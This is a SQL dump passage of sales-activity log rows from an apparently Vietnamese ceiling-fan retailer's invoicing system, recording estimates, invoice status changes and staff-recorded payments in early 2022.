(242, 'invoice', 48, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-22 17:30:06'),
(243, 'invoice', 48, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:30:17'),
(244, 'invoice', 48, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.472.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/43\" target=\"_blank\">#43</a>\";}', '3', 'Hieu Le', '2022-02-22 17:30:17'),
(245, 'invoice', 49, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-23 11:30:06'),
(246, 'invoice', 49, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-23 11:30:06'),
(247, 'invoice', 49, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-23 11:30:18'),
(248, 'invoice', 49, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.200.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/44\" target=\"_blank\">#44</a>\";}', '3', 'Hieu Le', '2022-02-23 11:30:18'),
(249, 'invoice', 50, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-24 11:38:09'),
(250, 'invoice', 50, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-24 11:38:09'),
(251, 'invoice', 50, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-24 11:38:19'),
(252, 'invoice', 50, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.200.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/45\" target=\"_blank\">#45</a>\";}', '3', 'Hieu Le', '2022-02-24 11:38:19'),
(253, 'invoice', 51, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-24 12:05:29'),
(254, 'invoice', 51, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-24 12:05:29'),
(255, 'invoice', 51, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-24 12:05:39'),
(256, 'invoice', 51, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"20.200.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/46\" target=\"_blank\">#46</a>\";}', '3', 'Hieu Le', '2022-02-24 12:05:39'),
(257, 'estimate', 17, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-02-26 10:28:01'),
(258, 'invoice', 52, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-02-26 10:38:03'),
(259, 'estimate', 17, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/52\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-02-26 10:38:03'),
(260, 'estimate', 18, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-02-27 10:59:09'),
(261, 'estimate', 18, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '1', 'Ho Gia Phat', '2022-02-27 10:59:38'),
(262, 'invoice', 53, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-02-27 11:02:22'),
(263, 'estimate', 18, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/53\">INV-50-22</a>\";}', '1', 'Ho Gia Phat', '2022-02-27 11:02:22'),
(264, 'estimate', 19, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-02-28 13:12:11'),
(265, 'estimate', 20, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-01 09:14:04'),
(266, 'estimate', 20, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:6:\"350000\";}', '1', 'Ho Gia Phat', '2022-03-01 09:44:17'),
(267, 'invoice', 54, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-01 09:44:21'),
(268, 'estimate', 20, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/54\">INV-51-22</a>\";}', '1', 'Ho Gia Phat', '2022-03-01 09:44:21'),
(269, 'estimate', 13, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-01 15:23:15'),
(270, 'estimate', 14, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-01 15:23:38'),
(271, 'estimate', 14, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:407:\"MODEL NO.: 60YFT-808<br />\r\n- Fan size: 60inch ~ 1520mm, 5 blades solid Wood<br />\r\n- DC motor spec: DC Motor with BLDC, 38W<br />\r\n- Speed: 390 RPM<br />\r\n- Material blades: Wood, 5 blades<br />\r\n- Control: Remote control DC 6 speed included<br />\r\n- Power Input: 220V-240V/50Hz<br />\r\n- Motor Color: Nicken<br />\r\n- Blades Color: Light Wood<br />\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China<br />\r\n\";i:1;s:345:\"MODEL NO.: 60YFT-808\r\n- Fan size: 60inch ~ 1520mm, 5 blades solid Wood\r\n- DC motor spec: DC Motor with BLDC, 38W\r\n- Speed: 390 RPM\r\n- Material blades: Wood, 5 blades\r\n- Control: Remote control DC 6 speed included\r\n- Power Input: 220V-240V/50Hz\r\n- Motor Color: Nicken\r\n- Blades Color: Light Wood\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China\";}', '1', 'Ho Gia Phat', '2022-03-01 15:23:38'),
(272, 'estimate', 12, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-01 15:23:49'),
(273, 'invoice', 55, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-01 15:24:12'),
(274, 'estimate', 12, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/55\">INV-52-22</a>\";}', '1', 'Ho Gia Phat', '2022-03-01 15:24:12'),
(275, 'invoice', 54, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-03 10:34:32'),
(276, 'invoice', 54, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.265.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/47\" target=\"_blank\">#47</a>\";}', '1', 'Ho Gia Phat', '2022-03-03 10:34:32'),
(277, 'invoice', 54, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:17:\"info@hogiaphat.vn\";}', '1', 'Ho Gia Phat', '2022-03-03 10:34:40'),
(278, 'invoice', 56, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-07 15:04:30'),
(279, 'estimate', 19, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/56\">INV-53-22</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-07 15:04:30'),
(280, 'invoice', 56, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-07 15:04:47'),
(281, 'invoice', 56, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"19.500.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/48\" target=\"_blank\">#48</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-07 15:04:47'),
(282, 'invoice', 56, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-07 15:05:33'),
(283, 'invoice', 56, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:2:\"48\";i:1;s:13:\"19.500.000 đ\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-07 15:05:33'),
(284, 'estimate', 5, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:45:\"Bộ điều khiển AC 3 tốc độ ShengQi\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 10:58:11'),
(285, 'estimate', 5, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 11:01:42'),
(286, 'estimate', 21, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:16:41'),
(287, 'estimate', 21, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"455000.00\";i:1;s:10:\"4550000.00\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:22:57');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(288, 'estimate', 21, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:46:\" Quạt trần ABACUS 5 cánh gỗ tự nhiên\";i:1;s:45:\"Quạt trần ABACUS 5 cánh gỗ tự nhiên\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:22:57'),
(289, 'estimate', 21, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:7:\"3500000\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:22:57'),
(290, 'estimate', 21, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:50:\"Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:39:37'),
(291, 'estimate', 21, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:84:\"Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:39:37'),
(292, 'invoice', 57, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:44:46'),
(293, 'estimate', 21, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/57\">INV-54-22</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 14:44:46'),
(294, 'estimate', 22, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 16:02:53'),
(295, 'invoice', 58, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 16:03:10'),
(296, 'estimate', 22, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/58\">INV-55-22</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 16:03:10'),
(297, 'invoice', 52, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-08 19:17:38'),
(298, 'invoice', 52, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"19.600.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/49\" target=\"_blank\">#49</a>\";}', '1', 'Ho Gia Phat', '2022-03-08 19:17:38'),
(299, 'invoice', 57, 'invoice_activity_marked_as_cancelled', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 21:22:27'),
(300, 'invoice', 58, 'invoice_activity_marked_as_cancelled', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-08 21:22:48'),
(301, 'invoice', 57, 'invoice_activity_unmarked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-08 21:25:04'),
(302, 'invoice', 57, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-08 21:25:08'),
(303, 'invoice', 53, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-08 21:26:37'),
(304, 'invoice', 53, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.440.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/50\" target=\"_blank\">#50</a>\";}', '1', 'Ho Gia Phat', '2022-03-08 21:26:37'),
(305, 'invoice', 5, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-08 21:27:17'),
(306, 'invoice', 3, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-08 21:27:34'),
(307, 'invoice', 3, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-08 21:27:40'),
(308, 'invoice', 56, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-08 21:28:44'),
(309, 'estimate', 23, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-09 16:24:04'),
(310, 'estimate', 23, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:225:\"Quạt trần Haiku 44 inch<br />\r\nSải cánh : 112cm<br />\r\nĐộng cơ EC hiệu suất cao<br />\r\nBộ đèn LED dimmable đi lèm<br />\r\nBộ điều khiển từ xa 7 tốc độ đi kèm<br />\r\nMàu sắc: Đen<br />\r\n\";i:1;s:187:\"Quạt trần Haiku 44 inch\r\nSải cánh : 112cm\r\nĐộng cơ EC hiệu suất cao\r\nBộ đèn LED dimmable đi lèm\r\nBộ điều khiển từ xa 7 tốc độ đi kèm\r\nMàu sắc: Đen\";}', '1', 'Ho Gia Phat', '2022-03-09 16:24:59'),
(311, 'estimate', 23, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '1', 'Ho Gia Phat', '2022-03-09 16:24:59'),
(312, 'invoice', 59, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-09 16:25:53'),
(313, 'estimate', 23, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/59\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-03-09 16:25:53'),
(314, 'invoice', 59, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:217:\"Quạt trần Haiku 44 inch<br />\r\nSải cánh : 112cm<br />\r\nĐộng cơ EC hiệu suất cao<br />\r\nBộ đèn LED dimmable đi lèm<br />\r\nBộ điều khiển từ xa 7 tốc độ đi kèm<br />\r\nMàu sắc: Đen\";i:1;s:227:\"Quạt trần Haiku 44 inch\r\nSải cánh : 112cm\r\nĐộng cơ EC hiệu suất cao\r\nBộ đèn LED dimmable đi lèm\r\nBộ điều khiển từ xa 7 tốc độ đi kèm\r\nMàu sắc: Đen\r\nThương hiệu: Haiku/xuất xứ USA\";}', '1', 'Ho Gia Phat', '2022-03-09 16:26:58'),
(315, 'invoice', 33, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-09 17:45:09'),
(316, 'invoice', 33, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"28.560.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/51\" target=\"_blank\">#51</a>\";}', '1', 'Ho Gia Phat', '2022-03-09 17:45:09'),
(317, 'invoice', 7, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-09 18:08:33'),
(318, 'estimate', 24, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-10 16:05:20'),
(319, 'estimate', 24, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:24:\"Nhân công lắp đặt\";}', '1', 'Ho Gia Phat', '2022-03-10 16:06:59'),
(320, 'estimate', 22, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:53:\"Quạt trần cánh lớn Powerful S1 sải cánh 2m5\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 16:19:29'),
(321, 'estimate', 22, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 White ABS\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 16:19:29'),
(322, 'estimate', 22, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:53:\"Quạt trần cánh lớn Powerful S1 sải cánh 2m5\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 16:19:29'),
(323, 'estimate', 22, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 White ABS\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 16:19:29'),
(324, 'invoice', 60, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 17:10:25'),
(325, 'invoice', 60, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5040000.00\";i:1;s:7:\"6300000\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 17:16:53'),
(326, 'invoice', 60, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-10 17:16:53'),
(327, 'invoice', 60, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";i:1;s:25:\"Nhân công lắp đặt \";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-11 11:35:01'),
(328, 'invoice', 60, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:25:\"Nhân công lắp đặt \";i:1;s:49:\"Nhân công lắp đặt trần tấm thạch cao\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-11 11:36:03'),
(329, 'estimate', 25, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-11 17:07:15'),
(330, 'invoice', 33, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-12 11:05:17'),
(331, 'invoice', 33, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-12 11:05:30'),
(332, 'invoice', 33, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:2:\"51\";i:1;s:13:\"14.280.000 đ\";}', '1', 'Ho Gia Phat', '2022-03-12 11:05:30'),
(333, 'invoice', 33, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-12 11:06:56'),
(334, 'invoice', 33, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.280.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/52\" target=\"_blank\">#52</a>\";}', '1', 'Ho Gia Phat', '2022-03-12 11:06:56'),
(335, 'invoice', 33, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-12 11:07:32'),
(336, 'invoice', 33, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.280.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/53\" target=\"_blank\">#53</a>\";}', '1', 'Ho Gia Phat', '2022-03-12 11:07:32'),
(337, 'invoice', 7, 'invoice_activity_unmarked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-03-12 15:33:28'),
(338, 'invoice', 60, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-12 16:21:13'),
(339, 'invoice', 60, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.360.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/54\" target=\"_blank\">#54</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-12 16:21:13'),
(340, 'estimate', 26, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-14 09:07:04'),
(341, 'invoice', 61, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-14 15:49:10'),
(342, 'estimate', 27, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-16 09:29:25'),
(343, 'estimate', 28, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-16 10:35:52'),
(344, 'estimate', 27, 'estimate_activity_client_declined', '', NULL, '', '2022-03-16 10:41:14'),
(345, 'invoice', 62, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-17 09:34:26'),
(346, 'invoice', 63, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-17 15:04:29'),
(347, 'invoice', 64, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-17 21:26:08'),
(348, 'invoice', 63, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-21 08:10:25'),
(349, 'invoice', 62, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-21 08:11:50'),
(350, 'invoice', 62, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.280.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/55\" target=\"_blank\">#55</a>\";}', '1', 'Ho Gia Phat', '2022-03-21 08:11:50'),
(351, 'invoice', 65, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 09:46:11'),
(352, 'estimate', 29, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 13:49:19'),
(353, 'invoice', 65, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 15:27:22'),
(354, 'invoice', 65, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"500000.00\";i:1;s:9:\"300000.00\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 15:27:22'),
(355, 'estimate', 30, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 15:37:42'),
(356, 'invoice', 7, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 16:08:16'),
(357, 'invoice', 7, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.440.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/56\" target=\"_blank\">#56</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-21 16:08:16'),
(358, 'invoice', 66, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-22 08:39:48'),
(359, 'invoice', 67, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-22 14:00:58'),
(360, 'invoice', 67, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"660000.00\";i:1;s:10:\"6600000.00\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-22 14:02:33'),
(361, 'invoice', 68, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-22 17:24:07'),
(362, 'estimate', 31, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-23 10:30:16'),
(363, 'estimate', 31, 'estimate_activity_client_declined', '', NULL, '', '2022-03-23 10:56:01'),
(364, 'estimate', 32, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-23 10:59:15'),
(365, 'invoice', 66, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5660000.00\";i:1;s:10:\"5720000.00\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-23 11:05:31'),
(366, 'invoice', 68, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-23 13:27:38'),
(367, 'invoice', 68, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.025.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/57\" target=\"_blank\">#57</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-23 13:27:38'),
(368, 'invoice', 66, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-23 14:53:54'),
(369, 'invoice', 66, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"12.584.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/58\" target=\"_blank\">#58</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-23 14:53:54'),
(370, 'estimate', 33, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-23 15:07:42'),
(371, 'invoice', 69, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-23 15:13:15'),
(372, 'invoice', 69, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-23 15:41:43'),
(373, 'invoice', 69, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"15.725.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/59\" target=\"_blank\">#59</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-23 15:41:43'),
(374, 'invoice', 64, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-03-23 15:56:24'),
(375, 'invoice', 70, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-24 15:31:18'),
(376, 'estimate', 34, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-24 15:42:14'),
(377, 'invoice', 70, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-25 08:55:48'),
(378, 'invoice', 70, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.640.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/60\" target=\"_blank\">#60</a>\";}', '1', 'Ho Gia Phat', '2022-03-25 08:55:48'),
(379, 'invoice', 71, 'invoice_activity_created', '', '9', 'Ky Thuat HGP', '2022-03-26 13:05:41'),
(380, 'invoice', 71, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '9', 'Ky Thuat HGP', '2022-03-26 13:07:24'),
(381, 'invoice', 71, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.760.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/61\" target=\"_blank\">#61</a>\";}', '9', 'Ky Thuat HGP', '2022-03-26 13:07:24'),
(382, 'estimate', 35, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-27 10:11:55'),
(383, 'invoice', 72, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-27 10:24:16'),
(384, 'estimate', 35, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/72\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-03-27 10:24:16'),
